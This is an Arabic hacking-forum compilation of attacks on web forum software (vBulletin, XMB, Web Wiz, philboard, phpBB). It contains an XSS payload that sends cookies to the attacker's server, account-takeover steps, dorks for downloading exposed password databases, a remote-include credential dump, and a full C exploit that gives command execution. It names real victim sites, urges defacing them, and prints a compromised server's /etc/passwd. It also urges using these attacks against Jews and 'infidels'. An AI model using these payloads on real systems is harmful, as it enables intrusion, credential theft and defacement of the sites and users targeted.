بسم الله الرحمن الرحيم السلام عليكم ورحمة الله وبركاته الحمد لله رب العالمين و أفضل الصلاة و أتم التسليم على سيدنا محمد صلى الله عليه وعلى آله وصحبه أجمعين أما بعد: السلام عليكم ورحمة الله وبركاته : هذا الموضوع يحتوي على معلومات كثيرة ومفيدة لكل الهاكرز وبجميع مستوياتهم فأرجوا منكم أن لا تستخدموا هذه المعلومات في مضرة المسلمين و إيذاء إخوانكم في الدين ولكن أرجوا أن تستخدموها ضد اليهود وكفار و الرتدين أولا سم بالله وابدأ : بسم الله الرحمن الرحيم جميع طرق اختراق المنتديات --------- مقدمة : --------- الموضوع : اختراق الـ vBulletin المتطلبات : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) . المستوى : متوسط ملاحظة : هذه الطريقة ليست للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات . ---------- الثغرة : --------- تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML .. قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود : ********>********.write('<img src="http://my_ip_address/'+********.******************+'">';*********** مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك . وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) . وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك .. مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log . ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ ابحث عن الكود الخاص بالباسورد .. مثال : GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb ddf90622;%20sessionhash=a 4719cd620534914930b86839c4bb5f8;%20bbthreadview[54 20]=1012444064;%20bblastvi sit=1011983161 فكر قليلا الان .. اين الباسورد ؟؟ الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟ قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل http://www.victim.com/vb/index.php?bbuseri...sword=[password hash] ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) " في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) .. لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن .. اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. ! ------------ الحل ----------- للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... ) (واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت ) كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة ********> فاذا وضعت <img> او ********* او اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ . Be Secret .. Dont' be Lamer . تاريخ اكتشاف الثغرة : 31 - 1 - 2002 تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح . أرجو أن تستخدموا هذه الطريقة ضد العدو وألا تستخدموها ضد إخوانكم العرب والمسلمين ====================================== إختراق منتديات VP ====================================== اختراق المنتديات بس بمنتديات vb . قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي 2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك 3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members . أو العنوان التفصيلي التالي : http://URL/memberlist.php URL = العنوان المستضيف للمنتدى مثل = - .com 4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar . سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي : http://URL/member.php?soitgoe68e45u...info&userid=266 هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266 5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا http://URL/member.php?soitgoe68e45u...etinfo&userid=1 العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator . (((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == )) أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية 6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها : http://URL/member.php?action=login&...VALI...ame='ADMIN'').' العنوان هذا ستقوم بتغيير الكلمات التالية URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى VALIDUSER = أسم المستخدم الخاص بك VALIDPASS = كلمة السر الخاصة بك [email protected] = البريد الذي سجلت به بالمنتدى ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة ) 7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات ******* . 8. ثم ترجع لصفحة المنتدى الرئيسية http://url/index.php ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) . بالطيع ستظهر لك الصفحة التعيسة التي تقول : أنت قمت بكتابة كلمة سر خاطئة you typed in the wrong password 9. بكل بساطة أضغط على نسيت كلمة السر forgot password والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني 10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى ملاحظة هذه الطريقة قديمة وأغلب المنتديات قاموا بإغلاق هذه الثغرة يعني لا تستطيع فعلها إلا مع منتديات اليوم ====================================== إختراق منتديات xmb ====================================== تعتبر المنتديات من نوع xmb من المنتديات التي اكتيبت شهره واسعه في مجالها وحالها حال الكثير من الأنواع الأخرى من المنتديات من وجود الثغرات والأختراقات فلا يوجد شيء كامل على وجه الأرض الا الله عز وجل.. وصف للثغره:: وقد تم اكتشاف ثغره جديده في هذا النوع من المنتديات مما يمكنك ان تكون المدير على المنتدى او تكون مشرف اوي اي عضو اخر الأصدار المصاب::: XMB 1.6 Magic Lantern Final الشرح والتطبيق::: جاء وقت الشغل والجد<<< سوف اقوم بتقسيم الدرس على خطوات حتى يفهم ويكون اوووضح وأسهل: 1- عليك بالذهاب الى موقع جوجل Google 2- اكتب في منطقة البحث XMB 1.6 Magic Lantern Final 3- سوف ترى منتديات كثييييييييره اكثرها مصابه بهذه الثغره لكن رجاااء لاتقرب المنتديات العربية وعليك بتحذيرها من الثغره الموجوده. 4- اضغط على اي منتدى وقم بكتابة الكلمة التالية بعد عنوان المنتدى index_log.log يعني راح يكون متل هدا http://www.******.com/massegboard/index_log.log 5- راح ينزل عندك ملف والملف عباره عن ملف مثل الكوكيز كبير وفيه اسماء المستخدمين والباسورد وأشياء ثانيه ماتهمنا. 6- الأن عليك بالبحث في المنتدى عن اسم المدير وذلك بالذهاب الى المواضيع وتشوف الأسماء والي تلقى تحت اسمه ادمن ستريتور انسخ اسمه. 7- افتح الملف الي نزلته من الموقع وسوي بحث عن اسم المدير راح يجيك متل هذا مثلا:: xmbuser=admin واباس راح تلقاه قدامه مثل هذا xmbpw=1faeb6747a31c854800ddf3c62b1717a 8- طبعا الباس في هذه الحاله مشفر وفك التشفير صعب لهذا الغرض قامت شركة CCI بتصميم برنامج يقوم بهذا الغرض وهذه وصلت البرنامج ftp://www.cafecounterintelligence.com/cci/chigger.exe ====================================== إختراق منتديات Web Wiz Guide ====================================== مثال:basharnet.com هذه الطريقة أقدمها لكل الهاكرز المبتدئين لأنها سهلة جدا وما بدا غير تحمل هالملف وتتصفح الباسوورد على كيفيك دون تشفير يعني إذا كنت ما بتعرف شي عن الهاكر بقرائتك لهذه الثغرة تستطيع أن تخترق منتدى أغلب المنتديات مصابة بهذه الثغرة بسم الله الرحمن الرحيم الشرح: ثغرة تصيب منتديات Web Wiz Guide أولا إذهب إلى google اكتب Web Wiz forum وانتظر لحد ماتطلع لك المواقع الي تدعم هذا المنتدى ادخل المنتدى واكتب بعد forum admin/wwforum.mdb حمل الملف وادخل عليه عن طريق microsoft office access بعد ماتاخذ باسوورد المشرف العام اذهب إلى admin سجل اسمك والباسوورد الآن أنت في لوحة التحكم ها ها ها ها بس ما حدا يخترق المنتديات الوجودة في محرك البحث قوقل التي قمت باختراقها أنا هذا منتدى قمت باختراقه لاحقا http://www.plasticcube.com/Forum/default.asp اكتبوا فيه ما تشائون يا أعضاء وزوار منتديا عرب للأبد وهي منندى ثان هذا منتدى دينيماركي http://www.naturklub.dk/forum/ ثغرة في معظم منتديات الـ asp ++++++++++++++++++++++++++ سأذكر احد الثغرات في بعض اللغات الديناميكية(asp) active server pages وعليها فقس طبعا هذه اللغة وللأسف بها ثغرات قوية جدا وخصوصا في التعامل مع قواعد بياناتها . بشكل مختصر هذه اللغة تعتبر من لغات البرمجة الديناميكية التفاعلية لبرمجة مواقع الانترنت ولها ميزة بأن الكود لها مخفي والكثير من الناس يفضلونها لانها مدعومة من ما يكروسوفت على عكس وجهة نظري لاني ما أطيق اي برنامج من ما يكروسوفت الا اذا لم يوجد له بديل ...الخ وتعتمد قواعد بياناتها على ثلاثة أنواع هي : sqlserver && sql && M.S Access واما قاعدة بيانات ما يكروسوفت أكسس فثغراتها من أبسط الثغرات بحيث انك اذا وجدت امتدادا واسم قاعدة البانات فقط فانك تستطيع تحميلها على جهازك مباشرة وتصفح جميع الباسوردات بسهولة ويسر وبدون تشفير أيضا . واليكم المثال من أحد المنتديات التي تتضح جليه بها هذه الثغرة وهي باسم philboard.asp مثل هذا المنتدى http://www.khill.co.uk/forum/philboard.asp وطريقة ايجاد مثل هذا النوع منتديات اذهب الى جوجل كما ذكرنا سابقا وابحث عن -------------- > philboard وانتظر النتائج .... -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ كيف تحمل قاعدة البيانات ؟ اكتب هذا الامتداد وبعد ذلك حاول ان يكون المنتدى به عديد قليل من المواضيع حتى يكون حجم قاعدة البيانات صغير جدا للتطبيق والتسليم بسرعة وهذا هو امتداد واسم قاعدة البيانات لقاعدة البيانات database/philboard.mdb وتكتبه بعد اسم الموقع والمنتدى مثل http://www.khill.co.uk/forum/database/philboard.mdb ولا بد لكي تقرا قاعدة البيانات ان يكون في جهازك برنامج ما يكروسوفت أكسس وبعد فتح قاعدة البيانات ستجد بداخلها عدة جداول فيها جميع محتويات قاعدة البيانات من ضمنها وهو المهم جدول المستخدمين ال users وستجد اول اسم عالبا هو admin وهو اسم المدير العام مع الباسوورد الآن وبعد ان حصلنا على الاسم والباسوورد ماذا تبقى ؟ لم يبقى الى الدخول للوحة التحكم للمنتدى للتحكم فيه وكأنك المشرف العام philboard_admin.asp وهذا عنوانها مثال http://www.khill.co.uk/forum/philboard_admin.asp ادخل وستجد كل منتدى وبجانبة كلمه delete و edit احذف كل المنتديات وأنشا منتديات جديدة واكتب عليها hacked by xxxxxxxxxx xxxxxxx يعني اسمك ,,, من وين ؟ من المربعين الموجودة بالاسفل في لوحة التحكم اكتب في المستطيل hacked by xxxxxxxxxx وفي المربع الي اسفله ضع رسالة تود توجيهها لاصحاب الموقع واضغط add يعني اضافة ومبرووووووووووووووووووووو وووووووووووك ألف مبرووووووووووك اول اختراق لك والحل لهذه الثغرة / هو تغيير مسار قواعد البيانات لكل منتدى او تغيير اسمها . فكما راينا ان منتديات philboard.asp قواعد بياناتها جميعا لها نفس الاسم والامتداد __________________________________________________ تفضلو ثغرة في هاك الرد السريع منتدى PHPBB عند تركيبك لهاك الرد السريع سوف تجد هذا الكود if ( $mode == 'smilies' ) { define('IN_PHPBB', true); include($phpbb_root_path . 'extension.inc'); include($phpbb_root_path . 'common.'.$phpEx); include($phpbb_root_path . 'includes/functions_post.'.$phpEx); generate_smilies('window', PAGE_POSTING); exit; } دقق جيدا بهذا الكود ثم أنشاء ملف جديد سمه extension.inc وضع داخلها مثلا شفرة <?php include('config'.'.php'); echo "DB Type: $dbms <br>"; echo "DB Host: $dbhost <br>"; echo "DB Name: $dbname <br>"; echo "DB User: $dbuser <br>"; echo "DB Pass: $dbpasswd <br>"; exit; ?> يمكنك وض الخيارات التي تود مشاهدتها من الهاك الآن وبكل سهولة بعد تنزيل extension.inc الى موقع يدعم البي اتش بي أتجه الى هذا العنوان URL: http://[phpBB_Forum]/quick_reply...t_path=http://[Your Server]/&mode=smiles بسهولة أستبدل [phpBB_Forum] بعنوان المنتدى المستهدف [Your Server] بعنوان الموقع الذي قمت بوضع الملف اللذي أنشائناه به ماذا ترى؟؟؟ معلومات قاعدة البيانات بين ايديك الحل لهذه الثغرة الخطيرة والتي شردت الكثير من المنتديات : ببساطة أفتح الملف quick_reply.php أبحث عن if ( $mode == 'smilies' ) أَضف بعدها مباشرة phpbb_root_path = "./"; وانشاءالله انحلت المشكلة _________________ ثغره جديده في منتديات الvb ________________________ أرجوا عدم استخدام الثغرة على المسلمين وفيما يظر بالإسلام وفيما حرمه الله لكن هذي كانت على النسخة التجريبية Beta بالنسبة للثغرة فهي واضحة وهي تستغل عن طريق الرسائل private.php وتقوم بسرقة الكوكيز ولكن بشرط يكون مفعل كود الهتمل في المنتدى وصاحب الثغرة يذكر انه قد يكون من الضروري تسجيل الدخول لك طبعا استغلالها عن طريق تحويل الكود لملف html مع تغيير اسم الموقع ومجلد المنتدى http://[victim]/forum/private.php PHP: -------------------------------------------------------------------------------- From: Ferruh Mavituna Subject: VBulletin Preview Message&nbs p;- XSS Vuln --------------------------------------- --------------- VBulletin Private Message&nbs p;"Preview Message" XSS Vulnerability --------------------------------------- --------------- Any kind of XSS att acks possibility. ----------------------------------------------------- - About VBulletin; ----------------------------------------------------- - PHP Based Popular Forum& nbsp;Application Vendor & Demo; <a href="http://www.vbulletin.com/" target="_blank"><a href="http://www.vbulletin.com/" target="_blank">http://www.vbulletin.com/</a></a> --------------------------------------- --------------- Vulnerable; ----------------------------------------------------- - vBulletin 3.0.0 Beta 2 < br />vBulletin 2.x --------------------------------------- --------------- ----------------------------------------------------- - Vendor Status; ----------------------------------------------------- - I can not contact v endor for this issue ! No patch available at&nb sp;the moment; ----------------------------------------------------- - Solution; ----------------------------------------------------- - HTML Encoding like post& nbsp;thread preview page; ----------------------------------------------------- - Exploit Code; ----------------------------------------------------- - <html> <body> <form action="http://[victim]/forum/private.php"&nbs p;method="post" name="vbform"> <input type="hidden" name="do" value="insertpm" /> <input type="hidden" name="pmid" value="" /> <input type="hidden" name="forward" value="" /> <input type="hidden" name="receipt" value="0" /> <input type="text" class="bginput" name="title" value="" size="40" tabindex="2" /> <textarea name="message" rows="20" cols="70" wrap="virtual" tabindex="3"></textarea> <input type="submit" class="button" name="sbutton" value="Post Message" accesskey="s" tabindex="4" /> <input type="submit" class="button" value="Preview Message" accesskey="p" name="preview" onclick="this.form.dopreview = true; return true;this.form.submit()" tabindex="5" > <input type="checkbox" name="savecopy" value="1" id="cb_savecopy" checked="checked" /> <input type="checkbox" name="signature" value="1" id="cb_signature" /> <input type="checkbox" name="parseurl" value="1" id="cb_parseurl" checked="checked" /> <input type="checkbox" name="disablesmilies" value="1" id="cb_disablesmilies" /> </form> ********> //Set Values and Submit // You can write your own JS codes var xss = "">********>*****(********.coo kie)***********"; ********.vbform.title.value=xss; ********.vbform.preview.click(); *********** </body> </html> *You may need login first Ferruh Mavituna Web Application Security Consultant Freelance Developer & Designer <a href="http://ferruh.mavituna.com" target="_blank"><a href="http://ferruh.mavituna.com" target="_blank">http://ferruh.mavituna.com</a></a> [email protected] -------------------------------------------------------------------------------- ثغره جميله لاختراق منتيات الفورم ____________________________ طبعا تعتمد على تحميل قاعده البيانات من الموقع . . . . وامتدادها تكون . . . admin/wwforum.mdb www.###.com/forum تصبح . . . www.###.com/forum/admin/wwforum.mdb طريقه البحث عن الثغره . . . . www.google.com وتبحث عن Web Wiz forum ويمكنك كتابه Web Wiz forum 1 Web Wiz forum 2.1 __________________________________________________ ___________ ثغرة في منتديات vBulletin في ملفcalendar.php _ _ _ _ __ _ _ __ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ تأكد من وجود ملف calendar.php إذا كان موجود إدخل هذا العنوان http://www.example.com/vb/calendar....mma=...0;die();echo%22 المتغيرات 1-example.com بإسم الموقع 2-<command> بأي أمر لينكس مثا لأمر الباسوورد pwd ______________________________________________ ثغرة vBulletin ------------------------------------------------------------------- Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or ********** into the ********. So by directing a user to, for example: http://vulnerable/forum/memberlist....E********%3D%27 http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord% 2Ephp%3F****%3D%27%2B escape%28********%2E******************%29%3C%2Fscr ipt%3E (NOTE: The URL should be on a one line) You can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site html file: ********> ******** = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3E********%3D %27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco rd%2Ephp%3F****%3D%27 %2Bescape%28********%2E******************%29%3C%2F script%3E" *********** And then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired, the above link will proceed first to the memberlist w/****************** stealing code, and then to http://www.swgmotu.com. With the recorded user id and password hash, we can access the site: http://www.vbulletin.com/forum/index.php?b...sword=[password hash] ----------------------------------------------------------------------------------- منقول من موقع امركي ___________________________________ ثغرة vbulletin2 gosper is credited with disclosing this to securiteam on 9-24-02 along with a working exploit and he probably discovered it too. I wrote this because his exploit didn't URL encode all the characters that needed to be URL encoded in order for some of the inputted commands to work properly. I added a date argument which is essential for exploiting the security hole. I also used an fdopen() and fgets() to make sure all the output was recieved and displayed correctly, at least I hope it works better . Last thing I built in was HTTP version 1.1 support so that you can use this against virtual hosts. Yeah... and you can exploit this with a web browser too, its just easier to use this program, most of the time. Greetz to JadaCyrus, Terrorist, IreEnigma, badpack3t, biocenosis, ttye0, End of Days, sk3tch and all the people in #ozane (www.ozane.net). If I forgot you, well ****. Compile: gcc vbcal.c -o vbcal */ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #include <signal.h> #include <unistd.h> #define url1 "calendar.php?calbirthdays=1&action=getday&day =" #define url2 "&comma=%22;echo%20'';%20echo%20%60" #define url3 "%60;die();echo%22" void time_out(void) { printf("ntimed out on connect()n"); exit(0); } void usage (char *prog) { printf("nt %s <-h host> <-d date> [-u url_path] [-p port] [-t timeout] [-v (verbose)]nn", prog); printf("t The -h and -d arguments are required, the rest are optional."); printf("nt date takes the format Year-Month-Day: 2002-11-14 = Nov. 14 2002."); printf("nt date must also be a date on the vBulletin board that has an event on it.n"); printf("nt **Note: if you get a HTML dump of a vBulletin page, you probably used a date without an event on it."); printf("nnt Examples: %s -h 192.168.1.2 -d 2001-12-8", prog); printf("nt %s -h 192.168.1.2 -d 2002-11-14 -u /forums/ -p 8080 -t 20 -vnn", prog); exit(0); } int main(int argc, char *argv[]) { int c, x, sockfd, verbose = 0; int timeout = 10; /* timeout for connection */ int port = 80; /* 80 default for HTTPD */ char *path = "/"; /* url path, default = "/" */ char *host = NULL, *date = NULL; char sign = '%'; char *prog; char tmp[2]; char tmp2[4]; char cmd_buf[501]; char encoded_cmd[501]; char data[1024]; char output[20480]; /* 20k recv buf */ struct sockaddr_in addr; struct hostent *he; struct sigaction action; FILE *f; memset(&tmp, '', sizeof(tmp)); memset(&tmp2, '', sizeof(tmp2)); memset(&cmd_buf, '', sizeof(cmd_buf)); memset(&encoded_cmd, '', sizeof(encoded_cmd)); memset(&data, '', sizeof(data)); memset(&output, '', sizeof(output)); prog = argv[0]; fprintf(stderr, "t ---[ vb_cal.cn"); fprintf(stderr, "t ---[ vBulletin 2.0.3 and before Calendar exploitn"); fprintf(stderr, "t ---[ c0ded by st0icn"); fprintf(stderr, "t ---[ www.fsix.netn"); if (argc < 5 || argc > 12) usage(prog); while ( (c = getopt(argc, argv, "h:d:u:t:v")) != -1 ) { switch© { case 'h': /* host */ { host = optarg; break; } case 'd': { date = optarg; break; } case 'u': /* url path */ { path = optarg; break; } case 'p': /* port */ { port = atoi(optarg); break; } case 't': /* connect timeout */ { timeout = atoi(optarg); break; } case 'v': { verbose = 1; break; } default: usage(prog); } } /* make sure we got the required stuff */ if (host == NULL) usage(prog); else if (date == NULL) usage(prog); if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket()"); exit(1); } if ( (he = gethostbyname(host)) == NULL) { perror("gethostbyname()"); exit(1); } bzero(&addr, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr = *( (struct in_addr *)he->h_addr); addr.sin_port = htons(port); bzero(&action, sizeof(action)); action.sa_handler = (void *)time_out; action.sa_flags = 0; sigaction(SIGALRM, &action, 0); alarm(timeout); if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1) { perror("connect()"); exit(1); } alarm(0); printf("\q to exit cmd promptn"); while(1) { printf("cmd> "); fgets(cmd_buf, sizeof(cmd_buf), stdin); for (x = 0; x < strlen(cmd_buf); x++) if (cmd_buf[x] == 'n') cmd_buf[x] = ''; if ( (cmd_buf[0] == '' && cmd_buf[1] == 'q') ) exit(0); for (x = 0; x < strlen(cmd_buf); x++) { tmp[0] = cmd_buf[x]; /* 0 - 9 */ if ( (cmd_buf[x] >= 0 && cmd_buf[x] <= 9) ) strncat(encoded_cmd, tmp, sizeof(encoded_cmd)); /* A - Z */ else if ( (cmd_buf[x] >= 65 && cmd_buf[x] <= 90) ) strncat(encoded_cmd, tmp, sizeof(encoded_cmd)); /* a - z */ else if ( (cmd_buf[x] >= 97 && cmd_buf[x] <= 122) ) strncat(encoded_cmd, tmp, sizeof(encoded_cmd)); /* everything not a letter or number */ else { snprintf(tmp2, sizeof(tmp2), "%c%X", sign, cmd_buf[x]); strncat(encoded_cmd, tmp2, sizeof(encoded_cmd)); } } /* use HTTP/1.1 in order to send valid HTTP commands to virtual hosts */ snprintf(data, sizeof(data), "GET %s%s%s%s%s%s HTTP/1.1nHost: %snn", path, url1, date, url2, encoded_cmd, url3, host); /* be verbose about the string we're sending in case we need to debug. */ if (verbose == 1) printf("nSending: %s", data); send(sockfd, data, sizeof(data), 0); if ( (f = fdopen(sockfd, "r+") ) == NULL) { perror("fdopen()"); exit(1); } while(1) { fgets(output, sizeof(output), f); if (feof(f) != 0) break; else printf("%s", output); memset(&output, '', sizeof(output)); } memset(&cmd_buf, '', sizeof(cmd_buf)); memset(&encoded_cmd, '', sizeof(encoded_cmd)); memset(&data, '', sizeof(data)); memset(&output, '', sizeof(output)); fclose(f); if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket()"); exit(1); } alarm(timeout); if ( connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1) { perror("connect()"); exit(1); } alarm(0); } return 0; } ----------------------------------- منقول من موقع أمريكي يالي بدو يترجو يحط ترجمتوا بالموضوع هذا ______________________________ ثغرة vBulletin quote: -------------------------------------------------------------------------------- Originally posted by MAKS: Within the first few lines of code in memberlist.php, the variable $letterbits is evaluated. Because of the way PHP initializes variables, we can inject HTML or ********** into the ********. So by directing a user to, for example: http://vulnerable/forum/memberlist....E********%3D%27 http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord% 2Ephp%3F****%3D%27%2B escape%28********%2E******************%29%3C%2Fscr ipt%3E (NOTE: The URL should be on a one line) You can steal the user's password hash and user id. Because of the way vBulletin parses URLs, the above will not function inside the forum, but if we put this in an off-site html file: ********> ******** = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3E********%3D %27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Freco rd%2Ephp%3F****%3D%27 %2Bescape%28********%2E******************%29%3C%2F script%3E" *********** And then link to it instead, the exploit will work as intended. The user doesn't even have to be aware of what has transpired, the above link will proceed first to the memberlist w/****************** stealing code, and then to http://www.swgmotu.com. With the recorded user id and password hash, we can access the site: http://www.vbulletin.com/forum/index.php?b...sword=[password hash] ----------------------------------------------------------------------------------- منقول من موقع امركي -------------------------------------------------------------------------------- ثغرة في منتديات vbulletin 2.0.3 بسم الله الرحمن الرحيم الثغرة وظيفتها ببساطة انها تسمحلك تنفذ اوامر على الجهاز زي البي اتش بي شيل فرحنا انا و صاحبي لاعز صديق للهكر الاخ قوقل و قلناله جبلنا مواقع شغالة على vbulletin 2.0.3 طبعا ما قصر قوقل و جبلنا لسته فاخترنا وحدة منهم و كان الموقع هو http://www.romulus2.com <بعرف اني حاندم على اني حطيت الموقع بس يللا مو مشكلة> و طبقنا الثغرة ظهر الشكل http://www.romulus2.com/forum/calen...001-...0`;die();echo" و مكان <command> نحط الامر الي بدنا ياه فاول شي قلنا خلينا نعرف مين نحنا فحطينا whoami و الي طلع انا استبشرت خير على الاقل مني nobody فقلت خليني اخد نظرة على ملف الباسوورد و اشوف المواقع على السيرفر فحطيت cat /etc/passwd مكان <command> و طلع root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0perator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP User:/home/ftp: nobody:x:99:99:Nobody:/: gtd:x:501:100::/home/gtd:/bin/bash majordomo:x:504:103::/home/majordomo:/bin/bash quota25:*:505:1::/home/quota25: quota50:*:506:1::/home/quota50: quota75:*:507:1::/home/quota75: quota100:*:508:1::/home/quota100: quota150:*:509:1::/home/quota150: quota300:*:510:1::/home/quota300: quota2:*:511:1::/home/quota2: quota5:*:512:1::/home/quota5: quota10:*:513:1::/home/quota10: msql:x:497:100::/home/msql:/bin/bash userquota:x:503:100:quota:/home/userquota:/bin/bash johnv:*:516:1::/home/johnv: minerva:x:514:516::/home/minerva:/bin/bash taosfineart:x:517:517::/home/taosfineart:/bin/bash technoasylum:x:518:518::/home/technoasylum:/bin/bash ward-tech:x:519:519::/home/ward-tech:/bin/bash malio:x:522:522::/home/malio:/bin/bash cindyland:x:529:529::/home/cindyland:/bin/bash mathom-house:x:532:532::/home/mathom-house:/bin/bash libertywebhosting:x:534:534::/home/libertywebhosting:/bin/bash bonfiglioreed:x:537:537::/home/bonfiglioreed:/bin/bash oldtymespizza:x:539:539::/home/oldtymespizza:/bin/bash dogshowjournal:x:546:545::/home/dogshowjournal:/bin/bash surfclassic:x:550:549::/home/surfclassic:/bin/bash thomason-development:x:552:551::/home/thomason-development:/bin/bash james:x:553:534::/home/james:/bin/emailonly alexr:x:554:534::/home/alexr:/bin/emailonly god:x:555:522::/home/god:/bin/emailonly sales:x:556:522::/home/sales:/bin/bash info:x:557:522::/home/info:/bin/emailonly ryugen:x:558:552::/home/ryugen:/bin/bash allanart:x:566:559::/home/allanart:/bin/bash womensphotoworks:x:573:564::/home/womensphotoworks:/bin/bash mbaentry:x:576:567::/home/mbaentry:/bin/bash omahasoaring:x:577:568::/home/omahasoaring:/bin/bash talvee:x:582:549::/home/talvee:/bin/emailonly mobilewashenvironmental:x:585:572::/home/mobilewashenvironmental:/bin/bash mobilewashservices:x:589:576::/home/mobilewashservices:/bin/bash ocdeaf:x:591:578::/home/ocdeaf:/bin/bash foxfire-goldens:x:592:579::/home/foxfire-goldens:/bin/bash finchair:x:594:580::/home/finchair:/bin/bash americanabatement:x:595:581::/home/americanabatement:/bin/bash whiskersgraphics:x:596:582::/home/whiskersgraphics:/bin/bash ronemous:x:604:568::/home/ronemous:/bin/emailonly parrotranch:x:605:588::/home/parrotranch:/bin/bash erlefamily:x:606:589::/home/erlefamily:/bin/ftponly parduhn:x:610:593::/home/parduhn:/bin/bash riptideproductions:x:616:596::/home/riptideproductions:/bin/bash kaialece:x:626:604::/home/kaialece:/bin/bash zeeksystems:x:627:605::/home/zeeksystems:/bin/bash trevor:x:630:596::/home/trevor:/bin/emailonly dino:x:631:522::/home/dino:/bin/emailonly loconsigo:x:632:608::/home/loconsigo:/bin/bash delamerevineyard:x:643:613::/home/delamerevineyard:/bin/bash michael:x:652:605::/home/michael:/bin/emailonly jereme:x:654:596::/home/jereme:/bin/emailonly windows-tips:x:655:624::/home/windows-tips:/bin/bash ghost-ride:x:657:626::/home/ghost-ride:/bin/bash cprltd:x:663:629::/home/cprltd:/bin/bash batmanandbarbie:x:673:636::/home/batmanandbarbie:/bin/bash housegroove:x:674:637::/home/housegroove:/bin/bash washglass:x:675:638::/home/washglass:/bin/bash djmattson:x:676:639::/home/djmattson:/bin/bash 